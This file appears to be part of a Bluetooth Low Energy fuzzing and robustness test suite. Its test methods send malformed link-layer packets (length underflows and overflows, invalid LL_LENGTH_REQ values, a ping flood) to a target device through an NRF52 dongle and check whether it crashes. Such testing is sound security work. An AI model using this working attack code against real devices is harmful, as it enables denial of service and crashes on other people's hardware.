def test_link_layer_LL_ATT_CRUSH(self): none_count = 0 # Send feature request pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU( ) / LL_FEATURE_REQ() self.driver.send(pkt) log.info('Waiting for activity') while True: pkt = None # Receive packet from the NRF52 Dongle data = self.driver.raw_receive() if data: # Decode Bluetooth Low Energy Data pkt = BTLE(data) # if packet is incorrectly decoded, you may not be using the dongle if pkt is None: none_count += 1 if none_count >= 4: log.info('NRF52 Dongle not detected') sys.exit(0) continue elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt: # Print slave data channel PDUs summary log.info("Slave RX <--- " + pkt.summary()[7:]) if LL_FEATURE_RSP in pkt: # Here we send a key size with 253, which is way higher than the usual 16 bytes for the pairing procedure att_mtu_req = BTLE( access_addr=self.access_address) / BTLE_DATA( ) / L2CAP_Hdr() / ble.ATT_Hdr( ) / ble.ATT_Exchange_MTU_Request(mtu=247) for i in range(3): self.driver.send( att_mtu_req ) #Send mtu request again (3 consecutive connection events) log.info('Sending three att_mtu_req') # pkt = BTLE(access_addr=access_address) / BTLE_DATA() / CtrlPDU() / LL_TERMINATE_IND() # self.driver.send(pkt) scan_req = BTLE() / BTLE_ADV(RxAdd=0) / BTLE_SCAN_REQ( ScanA=self.master_address, AdvA=self.advertiser_address) self.driver.send(scan_req) log.info( 'Disconnecting from slave' ) #Go back to advertisement channel (without sending LL_TERMINATE_IND) #self.driver.send(scan_req) # Go back to advertisement channel (without sending LL_TERMINATE_IND) pulse = ble.check_pulse_via_mtu_exchange( self.driver, self.access_address) #pulse = ble.check_pulse_via_scan(self.driver,self.master_address, self.advertiser_address) self.assertTrue( pulse, "Device did not respond to provisioning. Presumed dead...." ) break log.info('Test Completed')
def test_link_layer_LL_CONNECTION_UPDATE_REQ_002(self): log.info("Test CONNECTION_UPDATE_REQ UNDERFLOW") # Internal vars none_count = 0 # Send feature request pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU( ) / LL_FEATURE_REQ() self.driver.send(pkt) while True: pkt = None # Receive packet from the NRF52 Dongle data = self.driver.raw_receive() if data: # Decode Bluetooth Low Energy Data pkt = BTLE(data) # if packet is incorrectly decoded, you may not be using the dongle if pkt is None: none_count += 1 if none_count >= 4: log.error('NRF52 Dongle not detected') sys.exit(0) continue elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt: # Print slave data channel PDUs summary log.debug("Slave RX <--- " + pkt.summary()[7:]) # --------------- Process Link Layer Packets here ------------------------------------ if LL_FEATURE_RSP in pkt: packet = BTLE(access_addr=self.access_address) / BTLE_DATA( ) / CtrlPDU() / LL_CONNECTION_UPDATE_REQ( win_size= 2, # 2.5 of windows size (anchor connection window size) win_offset= 1, # 1.25ms windows offset (anchor connection point) interval=20, # 25ms connection interval latency=3, # Slave latency (any) timeout=55, # Supervision timeout, 500ms (any) ) packet.len = 1 # Underflow self.driver.send(packet) log.info('Malformed packet was sent') pulse = ble.check_pulse_via_mtu_exchange( self.driver, self.access_address) self.assertTrue( pulse, "Device did not respond to provisioning. Presumed dead...." ) break log.info("Test complete")
def test_link_layer_LL_CHANNEL_MAP_REQ_002(self): log.info("Test CHANNEL_MAP_REQ UNDERFLOW") # Internal vars none_count = 0 # Send feature request pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU( ) / LL_FEATURE_REQ() self.driver.send(pkt) while True: pkt = None # Receive packet from the NRF52 Dongle data = self.driver.raw_receive() if data: # Decode Bluetooth Low Energy Data pkt = BTLE(data) # if packet is incorrectly decoded, you may not be using the dongle if pkt is None: none_count += 1 if none_count >= 4: log.error('NRF52 Dongle not detected') sys.exit(0) continue elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt: # Print slave data channel PDUs summary log.debug("Slave RX <--- " + pkt.summary()[7:]) # --------------- Process Link Layer Packets here ------------------------------------ if LL_FEATURE_RSP in pkt: packet = BTLE(access_addr=self.access_address) / BTLE_DATA( ) / CtrlPDU() / LL_CHANNEL_MAP_REQ( chM=0x0000000001, # chM=0x1110000000, # Send to advertising channel instant=1000) packet.len = 1 # Underflow self.driver.send(packet) log.info('Malformed packet was sent') pulse = ble.check_pulse_via_mtu_exchange( self.driver, self.access_address) self.assertTrue( pulse, "Device did not respond to provisioning. Presumed dead...." ) break log.info("Test complete")
def test_link_layer_LL_LENGTH_REQ_single_test_001(self): """"Test LL_LENGTH_REQ with invalid parameters Attack Type: CWE-20: Improper Input Validation""" log.info("Test LL_LENGTH_REQ with invalid parameters 001") # Internal vars none_count = 0 end_connection = False # Send version indication request pkt = pkt = BTLE(access_addr=self.access_address) / BTLE_DATA( ) / CtrlPDU() / LL_VERSION_IND(version='4.2') self.driver.send(pkt) while True: pkt = None # Receive packet from the NRF52 Dongle data = self.driver.raw_receive() if data: # Decode Bluetooth Low Energy Data pkt = BTLE(data) # if packet is incorrectly decoded, you may not be using the dongle if pkt is None: none_count += 1 if none_count >= 4: log.error('NRF52 Dongle not detected') sys.exit(0) continue elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt: # Print slave data channel PDUs summary log.debug("Slave RX <--- " + pkt.summary()[7:]) # --------------- Process Link Layer Packets here ------------------------------------ if LL_VERSION_IND in pkt: pkt = BTLE(access_addr=self.access_address) / BTLE_DATA( ) / CtrlPDU() / LL_LENGTH_REQ(max_tx_bytes=0) self.driver.send(pkt) log.info('Malformed packet was sent') log.debug("Attack Packet:\n" + pkt.show(dump=True)) time.sleep(1) pulse = ble.check_pulse_via_mtu_exchange( self.driver, self.access_address) self.assertTrue( pulse, "Device not discovered during scan. Presumed dead....") break log.info("Test complete")
def test_link_layer_LL_PING_REQ_001(self): """"Test LL_PING_REQ with length overflow Attack Type: CWE-787 Out-of-bounds Write""" log.info("Test LL_PING_REQ with with length overflow 001") # Internal vars none_count = 0 # Send feature request pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU( ) / LL_FEATURE_REQ() self.driver.send(pkt) while True: pkt = None # Receive packet from the NRF52 Dongle data = self.driver.raw_receive() if data: # Decode Bluetooth Low Energy Data pkt = BTLE(data) # if packet is incorrectly decoded, you may not be using the dongle if pkt is None: none_count += 1 if none_count >= 4: log.error('NRF52 Dongle not detected') sys.exit(0) continue elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt: # Print slave data channel PDUs summary log.debug("Slave RX <--- " + pkt.summary()[7:]) # --------------- Process Link Layer Packets here ------------------------------------ if LL_FEATURE_RSP in pkt: pkt = BTLE(access_addr=self.access_address) / BTLE_DATA( ) / CtrlPDU() / LL_PING_REQ() pkt.len = 48 self.driver.send(pkt) log.info('Malformed packet was sent') log.debug("Attack Packet:\n" + pkt.show(dump=True)) time.sleep(1) pulse = ble.check_pulse_via_mtu_exchange( self.driver, self.access_address) self.assertTrue( pulse, "Device did not repsond to provisioning. Presumed dead...." ) break log.info("Test complete")
def test_link_layer_LL_DOS_001(self): log.info("Test LL_DOS") # Internal vars none_count = 0 # Send feature request pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU() / LL_VERSION_IND() self.driver.send(pkt) while True: pkt = None # Receive packet from the NRF52 Dongle data = self.driver.raw_receive() if data: # Decode Bluetooth Low Energy Data pkt = BTLE(data) # if packet is incorrectly decoded, you may not be using the dongle if pkt is None: none_count += 1 if none_count >= 4: log.error('NRF52 Dongle not detected') sys.exit(0) continue elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt: # Print slave data channel PDUs summary log.debug("Slave RX <--- " + pkt.summary()[7:]) # --------------- Process Link Layer Packets here ------------------------------------ if LL_VERSION_IND in pkt: for i in range(1,500): pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU() / LL_PING_REQ() self.driver.send(pkt) log.info('Malformed packet was sent') log.debug("Attack Packet:\n" + pkt.show(dump=True)) print("Number of packets:",i) time.sleep(0.1) pulse = ble.check_pulse_via_mtu_exchange(self.driver, self.access_address) self.assertTrue(pulse, "Device did not respond to provisioning. Presumed dead....") log.info("Test complete")
def test_link_layer_LL_LENGTH_REQ_001(self): """"Test LL_LENGTH_REQ with invalid parameters Attack Type: CWE-20: Improper Input Validation""" log.info("Test LL_LENGTH_REQ with invalid parameters 001") invalid_octets = [0,1,26,252,0xffff] invalid_times = [0, 1, 327, 2121, 0xffff] invalid_LL_LENGTH_REQ_inputs = [invalid_octets, invalid_times, invalid_octets, invalid_times] #invalid_LL_LENGTH_REQ_inputs = [0, 1, 26, 252] #perm = permutations(invalid_LL_LENGTH_REQ_inputs, 4) # produce all permutations perm = list(itertools.product(*invalid_LL_LENGTH_REQ_inputs)) number_of_permutations = len(perm) log.info("Total %d Tests" % number_of_permutations) for index, parameters in enumerate(perm): log.info("Running Test %d of %d" % (index, number_of_permutations)) # Internal vars none_count = 0 time.sleep(1) # Send feature request pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU() / LL_FEATURE_REQ() self.driver.send(pkt) while True: pkt = None # Receive packet from the NRF52 Dongle data = self.driver.raw_receive() if data: # Decode Bluetooth Low Energy Data pkt = BTLE(data) # if packet is incorrectly decoded, you may not be using the dongle if pkt is None: none_count += 1 if none_count >= 4: log.error('NRF52 Dongle not detected') sys.exit(0) continue elif BTLE_DATA in pkt and BTLE_EMPTY_PDU not in pkt: # Print slave data channel PDUs summary log.debug("Slave RX <--- " + pkt.summary()[7:]) # --------------- Process Link Layer Packets here ------------------------------------ if LL_FEATURE_RSP in pkt: pkt = BTLE(access_addr=self.access_address) / BTLE_DATA() / CtrlPDU() / LL_LENGTH_REQ( max_rx_bytes=parameters[0], max_rx_time = parameters[1], max_tx_bytes = parameters[2], max_tx_time = parameters[3] ) self.driver.send(pkt) log.info('Malformed packet was sent') log.debug("Attack Packet:\n" + pkt.show(dump=True)) time.sleep(1) pulse = ble.check_pulse_via_mtu_exchange(self.driver, self.access_address) self.assertTrue(pulse, "Device did not repsond to provisioning. Presumed dead....") break log.info("Test complete")